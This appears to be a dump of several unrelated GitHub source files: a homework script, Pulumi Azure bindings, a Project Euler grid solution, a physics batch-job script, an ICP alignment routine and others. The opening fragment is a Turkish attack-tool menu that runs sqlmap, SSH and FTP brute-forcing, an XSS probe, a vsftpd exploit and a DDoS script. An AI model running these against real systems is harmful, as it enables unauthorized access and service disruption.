site) os.system("dmitry -s ", site) os.system("dmitry -e ", site) os.system("dmitry -p ", site) if veri == "xss": target = input("Hedef URL : ") payload = ("<script>alert(123123);</script>") req = requests.post(target + payload) if payload in req.text: print ("XSS Açığı keşfetildi...") print ("Saldırı Yükü: "+payload) else: print ("Güvenli ") if veri == "sql": vulnsql = input("URL : ") os.system("sqlmap -u"+vulnsql+" --dbs --random-agent --tamper=space2comment ") if veri == "nikto": kulan = input("hedef =>") os.system("nikto -h "+kulan) if veri == "urlcrazy": url = input("url gir(site) => ") os.system("urlcrazy "+ url) if veri == "ssh": hostd = input("Wordlist yolu => ") hosta = input("Username var ise => ") hostb = input("Host adres => ") os.system("python3 sspy --wordlist "+hostd+" -U "+hosta+" -P 22 "+hostb) if veri == "ftp": hedef1 = input("Hedef => ") dosyauser1 = input("Username dosyası => ") dosyapass1 = input("Password dosyası => ") host1 = input("İp adres =>") os.system("medusa -U "+dosyauser1+" -P "+dosyapass1+" -h "+host1 +" -M ftp") if veri == "md5crack": dat2 = input("Kırılacak MD5 Hash ==> ") print("") print("_______________________________") print("") response = requests.get('http://www.nitrxgen.net/md5db/' + dat2).text print("crack sonucu => " , response) print("") print("cracklenen hash => " ,dat2) print("") print("_______________________________") if veri == "iptrace": target5= input("[+]Target -> : ") data = subprocess.check_output(["curl",f"http://ip-api.com/json/" + target ]).decode("utf-8") json.loads(data) print("İp Adress => " , json.loads(data)["query"]) print("şehir => " , json.loads(data)["city"]) print("Ülke => " , json.loads(data)["country"]) print("Posta Kodu => " , json.loads(data)["zip"]) print("Host => " , json.loads(data)["isp"]) print("Host => " , json.loads(data)["org"]) print("lat => " , json.loads(data)["lat"]) print("lat => " , json.loads(data)["lon"]) print("adres için lat değeri ve lon değerini sayılarını google'a yazınız ") if veri == "md5gen": user = input("YAZIYI GİR : ") h = hashlib.md5(user.encode()) h2 = h.hexdigest() print(h2) if veri == "whois": klk = input("Hedef site => ") os.system("whois "+klk) if veri == "subdomain": obje = input("Hedef domain => ") obje2 = input("çıktı verilcek dosya adı =>") os.system("python3 subdom -d "+obje+" -o "+obje2) if veri == "vsftpd": ipad = input("Hedef host => ") os.system("python3 py-vsftpd-exploit.py "+ipad) if veri == "ddos": os.system("python2 ddoser.py") if veri == "synack": os.system("python3 synack.py") if veri == "whatweb": what = input(" target => ") os.system("whatweb "+what) if veri == "clear": os.system("clear")
[ "noreply@github.com" ]
hawk-unity.noreply@github.com
774075e9fbc067028af2fc09e5962c2d20284cc4
3c7efd9093af21927318d707ac3a5027e9618ff1
/hw_4/jdfuller_hw_4_9_3.py
5bdaaadd0014a5091cbfa5f2afde2d1110ab9563
[]
no_license
nguyenhuuthinhvnpl/met-cs-521-python
1b628e7ca9ace43bd4732578bdffe9ace718593e
6faf68ad1780b2804d3df940b0d8b52ef1174ac0
refs/heads/master
2023-01-02T13:42:53.624212
2020-11-02T00:37:57
2020-11-02T00:37:57
null
0
0
null
null
null
null
UTF-8
Python
false
false
758
py
""" JD Fuller Class: CS 521 - Fall 1 Date: 04OCT2020 Homework Problem # 3 Description of Problem: Validate two lists for size, create a dictionary with keys of last name and value = first name """ # Two Constant lists f_name = ['Jane', 'John', 'Jack'] l_name = ['Doe', 'Deer', 'Black'] # Function to check length of input lists, create dictionary of combined values def dict_maker(l, f): # Check for equal length if len(l) != len(f): print("The two lists are not equal in length") else: # Combine two lists into dictionary with zip new_dict = dict(zip(l, f)) return new_dict print("First Names: " + str(f_name)) print("Last Names: " + str(l_name)) print("Name Dictionary: " + str(dict_maker(l_name, f_name)))
[ "jdfuller@live.com" ]
jdfuller@live.com
0d90a0e294b9f072e189229811680e4b4e3babb1
a777170c979214015df511999f5f08fc2e0533d8
/train.py
e6fbe847bc160c06cca04e2c8f32707f3e1cf0ac
[ "MIT", "Apache-2.0", "BSD-3-Clause" ]
permissive
srlee-ai/claf
210b2d51918cf210683e7489ccb8347cb8b1f146
89b3e5c5ec0486886876ea3bac381508c6a6bf58
refs/heads/master
2021-02-13T04:38:36.198288
2020-03-03T15:01:01
2020-03-03T15:01:01
244,661,892
0
0
MIT
2020-03-03T14:45:52
2020-03-03T14:45:52
null
UTF-8
Python
false
false
248
py
# -*- coding: utf-8 -*- from claf.config import args from claf.learn.experiment import Experiment from claf.learn.mode import Mode if __name__ == "__main__": experiment = Experiment(Mode.TRAIN, args.config(mode=Mode.TRAIN)) experiment()
[ "humanbrain.djlee@gmail.com" ]
humanbrain.djlee@gmail.com
34ac7a3126ac16fa1d6c38c6a98abcbeeac04fa3
cc18ad6df3249b891a8fb6491a940ac2a33d284a
/tests/test_l.py
8f31bdd414ae7368ace95e1ffa2f21be89d241f8
[]
no_license
ASU-CompMethodsPhysics-PHY494/activity-03-python_calculator
39ee8d654a3376a51a432179efd4c7a7e1de82d8
60acaaf07338294180e9c804d2343b4f4d41304d
refs/heads/main
2023-02-24T20:33:55.020537
2021-01-28T16:23:31
2021-01-28T16:23:31
333,042,224
0
1
null
null
null
null
UTF-8
Python
false
false
131
py
import pytest from .tst import _test_variable def test_l(name='l', reference=-1+3j): return _test_variable(name, reference)
[ "orbeckst@gmail.com" ]
orbeckst@gmail.com
23a2097a7cc61138e387807676a9e26a1c578749
48e124e97cc776feb0ad6d17b9ef1dfa24e2e474
/sdk/python/pulumi_azure_native/web/list_web_app_site_backups_slot.py
d462ca9222f2a90ee8600578a233a9c59f113a18
[ "BSD-3-Clause", "Apache-2.0" ]
permissive
bpkgoud/pulumi-azure-native
0817502630062efbc35134410c4a784b61a4736d
a3215fe1b87fba69294f248017b1591767c2b96c
refs/heads/master
2023-08-29T22:39:49.984212
2021-11-15T12:43:41
2021-11-15T12:43:41
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,748
py
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi SDK Generator. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities from . import outputs __all__ = [ 'ListWebAppSiteBackupsSlotResult', 'AwaitableListWebAppSiteBackupsSlotResult', 'list_web_app_site_backups_slot', 'list_web_app_site_backups_slot_output', ] @pulumi.output_type class ListWebAppSiteBackupsSlotResult: """ Collection of backup items. """ def __init__(__self__, next_link=None, value=None): if next_link and not isinstance(next_link, str): raise TypeError("Expected argument 'next_link' to be a str") pulumi.set(__self__, "next_link", next_link) if value and not isinstance(value, list): raise TypeError("Expected argument 'value' to be a list") pulumi.set(__self__, "value", value) @property @pulumi.getter(name="nextLink") def next_link(self) -> str: """ Link to next page of resources. """ return pulumi.get(self, "next_link") @property @pulumi.getter def value(self) -> Sequence['outputs.BackupItemResponse']: """ Collection of resources. """ return pulumi.get(self, "value") class AwaitableListWebAppSiteBackupsSlotResult(ListWebAppSiteBackupsSlotResult): # pylint: disable=using-constant-test def __await__(self): if False: yield self return ListWebAppSiteBackupsSlotResult( next_link=self.next_link, value=self.value) def list_web_app_site_backups_slot(name: Optional[str] = None, resource_group_name: Optional[str] = None, slot: Optional[str] = None, opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableListWebAppSiteBackupsSlotResult: """ Collection of backup items. API Version: 2020-12-01. :param str name: Name of the app. :param str resource_group_name: Name of the resource group to which the resource belongs. :param str slot: Name of the deployment slot. If a slot is not specified, the API will get backups of the production slot. """ __args__ = dict() __args__['name'] = name __args__['resourceGroupName'] = resource_group_name __args__['slot'] = slot if opts is None: opts = pulumi.InvokeOptions() if opts.version is None: opts.version = _utilities.get_version() __ret__ = pulumi.runtime.invoke('azure-native:web:listWebAppSiteBackupsSlot', __args__, opts=opts, typ=ListWebAppSiteBackupsSlotResult).value return AwaitableListWebAppSiteBackupsSlotResult( next_link=__ret__.next_link, value=__ret__.value) @_utilities.lift_output_func(list_web_app_site_backups_slot) def list_web_app_site_backups_slot_output(name: Optional[pulumi.Input[str]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, slot: Optional[pulumi.Input[str]] = None, opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[ListWebAppSiteBackupsSlotResult]: """ Collection of backup items. API Version: 2020-12-01. :param str name: Name of the app. :param str resource_group_name: Name of the resource group to which the resource belongs. :param str slot: Name of the deployment slot. If a slot is not specified, the API will get backups of the production slot. """ ...
[ "noreply@github.com" ]
bpkgoud.noreply@github.com
47253660053b62e3a3400992df6e8e5c92705a2f
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
/sdBs/AllRun/pg_2336+264/sdB_PG_2336+264_lc.py
5a89a24209124435ed571d1c422e1be8d34c29e3
[]
no_license
tboudreaux/SummerSTScICode
73b2e5839b10c0bf733808f4316d34be91c5a3bd
4dd1ffbb09e0a599257d21872f9d62b5420028b0
refs/heads/master
2021-01-20T18:07:44.723496
2016-08-08T16:49:53
2016-08-08T16:49:53
65,221,159
0
0
null
null
null
null
UTF-8
Python
false
false
346
py
from gPhoton.gAperture import gAperture def main(): gAperture(band="NUV", skypos=[354.680542,26.667064], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_PG_2336+264 /sdB_PG_2336+264_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3) if __name__ == "__main__": main()
[ "thomas@boudreauxmail.com" ]
thomas@boudreauxmail.com
41b07f3167dc701df489a7cfefe5e0ac8ffc139a
ced57a2acb564869237ba6e0d1a528f22eb8bd8d
/Problem11/py/p11.py
1199fef4addb9dee3abce8213d98b75b08323b35
[ "MIT" ]
permissive
shaunn/projecteuler
c79771f2c51fdb222f775887836b59ff29a5c752
eac7734c8a258f87bfa1ff944ad3bb208ad613d4
refs/heads/main
2023-03-25T21:40:51.172242
2021-03-26T04:00:00
2021-03-26T04:00:00
334,136,921
0
0
MIT
2021-03-26T04:00:00
2021-01-29T12:20:59
Python
UTF-8
Python
false
false
5,567
py
# In the 20×20 grid below, four numbers along a diagonal line have been marked in red. # # ``` # 08 02 22 97 38 15 00 40 00 75 04 05 07 78 52 12 50 77 91 08 # 49 49 99 40 17 81 18 57 60 87 17 40 98 43 69 48 04 56 62 00 # 81 49 31 73 55 79 14 29 93 71 40 67 53 88 30 03 49 13 36 65 # 52 70 95 23 04 60 11 42 69 24 68 56 01 32 56 71 37 02 36 91 # 22 31 16 71 51 67 63 89 41 92 36 54 22 40 40 28 66 33 13 80 # 24 47 32 60 99 03 45 02 44 75 33 53 78 36 84 20 35 17 12 50 # 32 98 81 28 64 23 67 10 26 38 40 67 59 54 70 66 18 38 64 70 # 67 26 20 68 02 62 12 20 95 63 94 39 63 08 40 91 66 49 94 21 # 24 55 58 05 66 73 99 26 97 17 78 78 96 83 14 88 34 89 63 72 # 21 36 23 09 75 00 76 44 20 45 35 14 00 61 33 97 34 31 33 95 # 78 17 53 28 22 75 31 67 15 94 03 80 04 62 16 14 09 53 56 92 # 16 39 05 42 96 35 31 47 55 58 88 24 00 17 54 24 36 29 85 57 # 86 56 00 48 35 71 89 07 05 44 44 37 44 60 21 58 51 54 17 58 # 19 80 81 68 05 94 47 69 28 73 92 13 86 52 17 77 04 89 55 40 # 04 52 08 83 97 35 99 16 07 97 57 32 16 26 26 79 33 27 98 66 # 88 36 68 87 57 62 20 72 03 46 33 67 46 55 12 32 63 93 53 69 # 04 42 16 73 38 25 39 11 24 94 72 18 08 46 29 32 40 62 76 36 # 20 69 36 41 72 30 23 88 34 62 99 69 82 67 59 85 74 04 36 16 # 20 73 35 29 78 31 90 01 74 31 49 71 48 86 81 16 23 57 05 54 # 01 70 54 71 83 51 54 69 16 92 33 48 61 43 52 01 89 19 67 48 # ``` # The product of these numbers is 26 × 63 × 78 × 14 = 1788696. # # What is the greatest product of four adjacent numbers in the same direction # (up, down, left, right, or diagonally) in the 20×20 grid? # # ------ # # Strategy # # - Create a matrix and load values into a list of lists # - Traverse each element in the row # - Create a temp list comprising of a legal set of elements that existing extending out in eight directions # - If the set is "illegal" i.e. the range goes beyond the boundaries of the grid, set phantom elements to zero or skip # - Compute the product of all elements in this tmp list and store it in a results list # - Find the max value in the results list and return it # adjacent_range = 4 input_grid = """08 02 22 97 38 15 00 40 00 75 04 05 07 78 52 12 50 77 91 08 49 49 99 40 17 81 18 57 60 87 17 40 98 43 69 48 04 56 62 00 81 49 31 73 55 79 14 29 93 71 40 67 53 88 30 03 49 13 36 65 52 70 95 23 04 60 11 42 69 24 68 56 01 32 56 71 37 02 36 91 22 31 16 71 51 67 63 89 41 92 36 54 22 40 40 28 66 33 13 80 24 47 32 60 99 03 45 02 44 75 33 53 78 36 84 20 35 17 12 50 32 98 81 28 64 23 67 10 26 38 40 67 59 54 70 66 18 38 64 70 67 26 20 68 02 62 12 20 95 63 94 39 63 08 40 91 66 49 94 21 24 55 58 05 66 73 99 26 97 17 78 78 96 83 14 88 34 89 63 72 21 36 23 09 75 00 76 44 20 45 35 14 00 61 33 97 34 31 33 95 78 17 53 28 22 75 31 67 15 94 03 80 04 62 16 14 09 53 56 92 16 39 05 42 96 35 31 47 55 58 88 24 00 17 54 24 36 29 85 57 86 56 00 48 35 71 89 07 05 44 44 37 44 60 21 58 51 54 17 58 19 80 81 68 05 94 47 69 28 73 92 13 86 52 17 77 04 89 55 40 04 52 08 83 97 35 99 16 07 97 57 32 16 26 26 79 33 27 98 66 88 36 68 87 57 62 20 72 03 46 33 67 46 55 12 32 63 93 53 69 04 42 16 73 38 25 39 11 24 94 72 18 08 46 29 32 40 62 76 36 20 69 36 41 72 30 23 88 34 62 99 69 82 67 59 85 74 04 36 16 20 73 35 29 78 31 90 01 74 31 49 71 48 86 81 16 23 57 05 54 01 70 54 71 83 51 54 69 16 92 33 48 61 43 52 01 89 19 67 48""" product_store = [] def main(): # Create the matrix matrix = load_grid(input_grid) # Using a,b instead of x,y because it will be confusing # without normalizing so it isn't y,x # a = 0 # Vertical, or row index # b = 0 # Horizontal, or column index a_max = len(matrix[0]) b_max = len(matrix) for a in range(a_max): for b in range(b_max): process_adjacent_products(matrix, (a, b), adjacent_range) print("Greatest product of four adjacent numbers in the same direction:") print(max(product_store)) def process_adjacent_products(_matrix, _coordinates, _range): # Moving counter-clockwise: E, SE, S, SW, W, NW, N, NE # where E, SE, and S are positively oriented from the origin # and N, NE, NW, W, and SW are negatively oriented from the origin # so the matrix is inverse for _ in range(2): process_products_over_range_and_direction(_matrix, _coordinates, _range) _matrix.reverse() _matrix = [sublist[::-1] for sublist in _matrix] def process_products_over_range_and_direction(_matrix, _coordinates, _range): _a = _coordinates[0] _b = _coordinates[1] # Just playing with an idea # (1, 0) Step increment a only (East to West) # (0, 1) Step increment b only (North to South) # (1, 1) Step increment both a and b (North-West to South-East) _cardinal_switches = [(1, 0), (0, 1), (1, 1)] for _switch in _cardinal_switches: _tmp_list = [] for _step in range(_range): # This test is to avoid index out of range errors if _a + (_switch[0] * _step) < len(_matrix[0]) and _b + (_switch[1] * _step) < len(_matrix): _tmp_list.append(_matrix[_a + (_switch[0] * _step)][_b + (_switch[1] * _step)]) product_store.append(get_product_of_list(_tmp_list)) def get_product_of_list(_list): _product = 1 for _factor in _list: _product *= _factor return _product def load_grid(_input): _output_matrix = [] _tmp_table = list(map(str, _input.split("\n"))) for _tmp_row in _tmp_table: _elements = list(map(int, _tmp_row.split(" "))) _output_matrix.append(_elements) return _output_matrix if __name__ == "__main__": main()
[ "noreply@github.com" ]
shaunn.noreply@github.com
3632c672e8908a01c30238f2f37c19a7580ccb3b
26cfe83c77d3724d21328224b349958d0f1d1086
/if else 2.py
bc049bf8b7521676ba82cee4b3c83aff2b8038d0
[]
no_license
oblakulovsardor/Start_python
a31c9eef52dca0babe50cc18a1c59d3f4cd0097b
ee745e5178bc896bc1d27271055ae4cbd8806369
refs/heads/main
2023-03-03T22:32:26.352536
2021-02-13T21:09:37
2021-02-13T21:09:37
338,150,765
0
0
null
null
null
null
UTF-8
Python
false
false
343
py
yosh = int(input('Tugikgan yilingiz qachon?\n>>>')) if 2021-yosh <4: print(f'Siz {2021-yosh} yosh yani 4 yosgdan kichiklarga kirish bepul') elif 2021-yosh <12: print(f'Siz {2021-yosh} yosh sizga kirish 5 000 sum, yani 12 yoshdan kichiklarga') else: print(f'Siz {2021-yosh} yosh sizga kirish 10 000 sum, yani 12 yoshdan kattalarga')
[ "oblakulov_sarik@mail.ru" ]
oblakulov_sarik@mail.ru
339b40cffdba256c1392efef793fe36cf721def1
e10cec4cc5d45a69c4f2eaa3d85565553458bcbe
/tracker_effi/run_trkreff.py
8176ff797b8082183ae591f9a82ca7c67bafabf1
[]
no_license
jnugent42/mcsframework
7f3ba2c11b96175d014e53f61bea292a5e0e3b03
2c75f6e071229ab0585cf8d594fa26d7b5794388
refs/heads/master
2022-04-28T07:34:32.076223
2022-04-07T16:14:17
2022-04-07T16:14:17
91,683,266
0
1
null
null
null
null
UTF-8
Python
false
false
10,320
py
import libxml2 import os, subprocess from ROOT import TRandom3, TMath def updatesysval(infile, outfile, name, value): doc = libxml2.parseFile(infile) for node in doc.xpathEval("spec/sys"): if node.prop("name").find(name) >= 0: node.setProp("value", str(value)) f = open(outfile,"w") doc.saveTo(f) f.close() doc.freeDoc() def updatecutval(infile, outfile, name, value): doc = libxml2.parseFile(infile) for node in doc.xpathEval("spec/cuts"): if node.prop("name").find(name) >= 0: node.setProp("value", str(value)) f = open(outfile,"w") doc.saveTo(f) f.close() doc.freeDoc() def updatefilename(infile, outfile, newname, name): doc = libxml2.parseFile(infile) for node in doc.xpathEval("spec/file"): if node.prop("id").find(name) >= 0: node.setProp("name", newname) f = open(outfile,"w") doc.saveTo(f) f.close() doc.freeDoc() def updatetrkreffiname(infile, outfile, newname): doc = libxml2.parseFile(infile) for node in doc.xpathEval("spec/file"): if node.prop("id").find("trkreffiname") >= 0: node.setProp("name", newname) f = open(outfile,"w") doc.saveTo(f) f.close() doc.freeDoc() def updateemptytrkreffiname(infile, outfile, newname): doc = libxml2.parseFile(infile) for node in doc.xpathEval("spec/file"): if node.prop("id").find("trkreffiemptyname") >= 0: node.setProp("name", newname) f = open(outfile,"w") doc.saveTo(f) f.close() doc.freeDoc() def submitUnfolding(xmlfile): execdir = "/data/neutrino03/jnugent/Unfolding" cmd = [os.path.join(execdir,"MCSUnfolding"), xmlfile] proc = subprocess.Popen(cmd) return proc def print_batch_submission(configfile, settings): testscript = '''#!/bin/bash cd %(working_dir)s . %(maus_root_dir)s/local_env.sh %(execcmd)s %(xmlfile)s '''% settings outfilename = '''%(shellscript)s'''% settings outfile0 = open(outfilename, 'w+') outfile0.write(testscript) outfile0.close() batch_data = ''' universe = vanilla executable = %(shellscript)s output = %(working_dir)s/%(name)s.out error = %(working_dir)s/%(name)s.err log = %(working_dir)s/%(name)s.log requirements = OpSysAndVer == "CentOS7" request_memory = 50 GB queue '''% settings outfile = open(configfile, 'w+') outfile.write(batch_data) outfile.close() def submit_to_batch(xmlfile, j): execdir = "/data/neutrino03/jnugent/Unfolding/tracker_effi" execcmd = os.path.join(execdir,"../../MCSUnfolding") maus_root_dir = "/data/neutrino03/jnugent/Unfolding/tracker_effi" working_dir = os.getcwd() name = xmlfile[:-4] settings = {"shellscript":xmlfile[:-4]+".sh", "xmlfile":xmlfile, "name":name, "working_dir":working_dir, "maus_root_dir":maus_root_dir, "execcmd":execcmd} batch_file = os.path.join(working_dir, name + ".job") print_batch_submission(batch_file, settings) cmd = ['condor_submit', batch_file] q = subprocess.Popen(cmd) q.wait() ''' llim_172 = 28.850290925 - 0.1 ulim_172 = 28.850290925 + 0.1 llim_200 = 28.1818843981 - 0.1 ulim_200 = 28.1818843981 + 0.1 llim_240 = 27.4975634301 - 0.1 ulim_240 = 27.4975634301 + 0.1 llpi_240 = 27.2 ulpi_240 = 27.8 ''' # llim_200 = 31.0472422527 - 0.1 # ulim_200 = 31.0472422527 + 0.1 llim_200 = 28.0537703996 - 0.1 ulim_200 = 28.0537703996 + 0.1 refllim_200 = 28.1920848764 - 0.1 refulim_200 = 28.1920848764 + 0.1 updatefilename("lihmu_3172_5.xml", "lihmu_3172_5.xml", "lihmu_3172_5.root", "outfile") updatefilename("lihmu_3172_5.xml", "lihmu_3172_5.xml", "/data/neutrino/jnugent/LiHMC/coectedoutput/", "datafile") updatefilename("lihmu_3240_5.xml", "lihmu_3240_5.xml", "lihmu_3240_5.root", "outfile") updatefilename("lihmu_3240_5.xml", "lihmu_3240_5.xml", "/data/neutrino01/jnugent/LiHMC/coctedoutput/", "datafile") submit_to_batch("LiHMu_3172_5.xml") submit_to_batch("LiHMu_3240_5.xml") for i in range(-5,8): ''' print llim_172, ulim_172 updatefilename("LiHMu_3172_5.xml", "LiHMu_3172_tof_lim"+str(llim_172 + i*0.2)+"_u"+str(ulim_172 + i*0.2)+".xml", "LiHMu_3172_tof_lim"+str(llim_172 + i*0.2)+"_u"+str(ulim_172 + i*0.2)+".root") updatetrkreffiname( \ "LiHMu_3172_tof_lim"+str(llim_172 + i*0.2)+"_u"+str(ulim_172 + i*0.2)+".xml", "LiHMu_3172_tof_lim"+str(llim_172 + i*0.2)+"_u"+str(ulim_172 + i*0.2)+".xml", "/home/ppe/j/jnugent/workarea/tracker_efficiency/tracker_resolution_plots_"+str(llim_172 + i*0.2)+".root") updatecutval("LiHMu_3172_tof_lim"+str(llim_172 + i*0.2)+"_u"+str(ulim_172 + i*0.2)+".xml", "LiHMu_3172_tof_lim"+str(llim_172 + i*0.2)+"_u"+str(ulim_172 + i*0.2)+".xml", "TOF_ll", llim_172 + i*0.2) updatecutval("LiHMu_3172_tof_lim"+str(llim_172 + i*0.2)+"_u"+str(ulim_172 + i*0.2)+".xml", "LiHMu_3172_tof_lim"+str(llim_172 + i*0.2)+"_u"+str(ulim_172 + i*0.2)+".xml", "TOF_ul", ulim_172 + i*0.2) submit_to_batch("LiHMu_3172_tof_lim"+str(llim_172 + i*0.2)+"_u"+str(ulim_172 + i*0.2)+".xml") # proc0 = submitUnfolding("LiHMu_3172_tof_lim"+str(llim_172 + i*0.2)+"_u"+str(ulim_172 + i*0.2)+".xml") ''' print llim_200, ulim_200 updatefilename("LiHMu_3200_5.xml", "LiHMu_3200_tof_lim"+str(llim_200 + i*0.2)+"_u"+str(ulim_200 + i*0.2)+".xml", "LiHMu_3200_tof_lim"+str(llim_200 + i*0.2)+"_u"+str(ulim_200 + i*0.2)+".root", "outfile") updatetrkreffiname( \ "LiHMu_3200_tof_lim"+str(llim_200 + i*0.2)+"_u"+str(ulim_200 + i*0.2)+".xml", "LiHMu_3200_tof_lim"+str(llim_200 + i*0.2)+"_u"+str(ulim_200 + i*0.2)+".xml", "/home/ppe/j/jnugent/workarea/tracker_efficiency/tracker_resolution_plots_"+str(llim_200 + i*0.2)+".root") updateemptytrkreffiname( \ "LiHMu_3200_tof_lim"+str(llim_200 + i*0.2)+"_u"+str(ulim_200 + i*0.2)+".xml", "LiHMu_3200_tof_lim"+str(llim_200 + i*0.2)+"_u"+str(ulim_200 + i*0.2)+".xml", "/home/ppe/j/jnugent/workarea/emptyeffi/tracker_resolution_plots_"+str(refllim_200 + i*0.2)+".root") updatecutval("LiHMu_3200_tof_lim"+str(llim_200 + i*0.2)+"_u"+str(ulim_200 + i*0.2)+".xml", "LiHMu_3200_tof_lim"+str(llim_200 + i*0.2)+"_u"+str(ulim_200 + i*0.2)+".xml", "TOF_ll", llim_200 + i*0.2) updatecutval("LiHMu_3200_tof_lim"+str(llim_200 + i*0.2)+"_u"+str(ulim_200 + i*0.2)+".xml", "LiHMu_3200_tof_lim"+str(llim_200 + i*0.2)+"_u"+str(ulim_200 + i*0.2)+".xml", "TOF_ul", ulim_200 + i*0.2) updatecutval("LiHMu_3200_tof_lim"+str(llim_200 + i*0.2)+"_u"+str(ulim_200 + i*0.2)+".xml", "LiHMu_3200_tof_lim"+str(llim_200 + i*0.2)+"_u"+str(ulim_200 + i*0.2)+".xml", "TOF_ll_ref", refllim_200 + i*0.2) updatecutval("LiHMu_3200_tof_lim"+str(llim_200 + i*0.2)+"_u"+str(ulim_200 + i*0.2)+".xml", "LiHMu_3200_tof_lim"+str(llim_200 + i*0.2)+"_u"+str(ulim_200 + i*0.2)+".xml", "TOF_ul_ref", refulim_200 + i*0.2) updatefilename("lihmu_3200_tof_lim"+str(llim_200 + i*0.2)+"_u"+str(ulim_200 + i*0.2)+".xml", "lihmu_3200_tof_lim"+str(llim_200 + i*0.2)+"_u"+str(ulim_200 + i*0.2)+".xml", "/data/neutrino/jnugent/LiHMC/coectedoutput/", "datafile") updatefilename("lihmu_3200_tof_lim"+str(llim_200 + i*0.2)+"_u"+str(ulim_200 + i*0.2)+".xml", "lihmu_3200_tof_lim"+str(llim_200 + i*0.2)+"_u"+str(ulim_200 + i*0.2)+".xml", "/data/neutrino01/jnugent/LiHMC/coectedoutput/", "trainfile") submit_to_batch("LiHMu_3200_tof_lim"+str(llim_200 + i*0.2)+"_u"+str(ulim_200 + i*0.2)+".xml", j) # proc1 = submitUnfolding("LiHMu_3200_tof_lim"+str(llim_200 + i*0.2)+"_u"+str(ulim_200 + i*0.2)+".xml") ''' print llim_240, ulim_240 updatefilename("LiHMu_3240_5.xml", "LiHMu_3240_tof_lim"+str(llim_240 + i*0.2)+"_u"+str(ulim_240 + i*0.2)+".xml", "LiHMu_3240_tof_lim"+str(llim_240 + i*0.2)+"_u"+str(ulim_240 + i*0.2)+".root") updatetrkreffiname( \ "LiHMu_3240_tof_lim"+str(llim_240 + i*0.2)+"_u"+str(ulim_240 + i*0.2)+".xml", "LiHMu_3240_tof_lim"+str(llim_240 + i*0.2)+"_u"+str(ulim_240 + i*0.2)+".xml", "/home/ppe/j/jnugent/workarea/tracker_efficiency/tracker_resolution_plots_"+str(llim_240 + i*0.2)+".root") updatecutval("LiHMu_3240_tof_lim"+str(llim_240 + i*0.2)+"_u"+str(ulim_240 + i*0.2)+".xml", "LiHMu_3240_tof_lim"+str(llim_240 + i*0.2)+"_u"+str(ulim_240 + i*0.2)+".xml", "TOF_ll", llim_240 + i*0.2) updatecutval("LiHMu_3240_tof_lim"+str(llim_240 + i*0.2)+"_u"+str(ulim_240 + i*0.2)+".xml", "LiHMu_3240_tof_lim"+str(llim_240 + i*0.2)+"_u"+str(ulim_240 + i*0.2)+".xml", "TOF_ul", ulim_240 + i*0.2) submit_to_batch("LiHMu_3240_tof_lim"+str(llim_240 + i*0.2)+"_u"+str(ulim_240 + i*0.2)+".xml") # proc2 = submitUnfolding("LiHMu_3240_tof_lim"+str(llim_240 + i*0.2)+"_u"+str(ulim_240 + i*0.2)+".xml") ''' ''' proc2.wait() proc1.wait() proc0.wait() print llpi_240, ulpi_240 updatefilename("XePion_3240.xml", "XePion_3240_tof_lim"+str(llpi_240 + i*0.2)+"_u"+str(ulpi_240 + i*0.2)+".xml", "XePion_3240_tof_lim"+str(llpi_240 + i*0.2)+"_u"+str(ulpi_240 + i*0.2)+".root") updatecutval("XePion_3240_tof_lim"+str(llpi_240 + i*0.2)+"_u"+str(ulpi_240 + i*0.2)+".xml", "XePion_3240_tof_lim"+str(llpi_240 + i*0.2)+"_u"+str(ulpi_240 + i*0.2)+".xml", "TOF_ll", llpi_240 + i*0.2) updatecutval("XePion_3240_tof_lim"+str(llpi_240 + i*0.2)+"_u"+str(ulpi_240 + i*0.2)+".xml", "XePion_3240_tof_lim"+str(llpi_240 + i*0.2)+"_u"+str(ulpi_240 + i*0.2)+".xml", "TOF_ul", ulpi_240 + i*0.2) submit_to_batch("XePion_3240_tof_lim"+str(llpi_240 + i*0.2)+"_u"+str(ulpi_240 + i*0.2)+".xml") '''
[ "john.nugent@glasgow.ac.uk" ]
john.nugent@glasgow.ac.uk
b921463d3f564663e3156653e0c50503afa1fdc6
3747770128a4e3abf616a94b236ddd9a6765e34a
/icp.py
84c389658ea0f09068070cd313c6f1791639305e
[]
no_license
abelttitus/vslam-recognition
dc941eed86ae68682452e77f1836d505a9315eae
f7cc2c6510f039f9633c2be5d96ad214e89c8198
refs/heads/master
2022-11-06T06:13:31.852238
2020-06-24T15:01:26
2020-06-24T15:01:26
261,393,430
0
0
null
null
null
null
UTF-8
Python
false
false
3,524
py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Fri May 8 11:24:47 2020 @author: abel """ import numpy as np from sklearn.neighbors import NearestNeighbors def best_fit_transform(A, B): ''' Calculates the least-squares best-fit transform that maps corresponding points A to B in m spatial dimensions Input: A: Nxm numpy array of corresponding points B: Nxm numpy array of corresponding points Returns: T: (m+1)x(m+1) homogeneous transformation matrix that maps A on to B R: mxm rotation matrix t: mx1 translation vector ''' assert A.shape == B.shape # get number of dimensions m = A.shape[1] # translate points to their centroids centroid_A = np.mean(A, axis=0) centroid_B = np.mean(B, axis=0) AA = A - centroid_A BB = B - centroid_B # rotation matrix H = np.dot(AA.T, BB) U, S, Vt = np.linalg.svd(H) R = np.dot(Vt.T, U.T) # special reflection case if np.linalg.det(R) < 0: Vt[m-1,:] *= -1 R = np.dot(Vt.T, U.T) # translation t = centroid_B.T - np.dot(R,centroid_A.T) # homogeneous transformation T = np.identity(m+1) T[:m, :m] = R T[:m, m] = t return T, R, t def nearest_neighbor(src, dst): ''' Find the nearest (Euclidean) neighbor in dst for each point in src Input: src: Nxm array of points dst: Nxm array of points Output: distances: Euclidean distances of the nearest neighbor indices: dst indices of the nearest neighbor ''' assert src.shape == dst.shape neigh = NearestNeighbors(n_neighbors=1) neigh.fit(dst) distances, indices = neigh.kneighbors(src, return_distance=True) return distances.ravel(), indices.ravel() def icp(A, B, init_pose=None, max_iterations=20, tolerance=0.001): ''' The Iterative Closest Point method: finds best-fit transform that maps points A on to points B Input: A: Nxm numpy array of source mD points B: Nxm numpy array of destination mD point 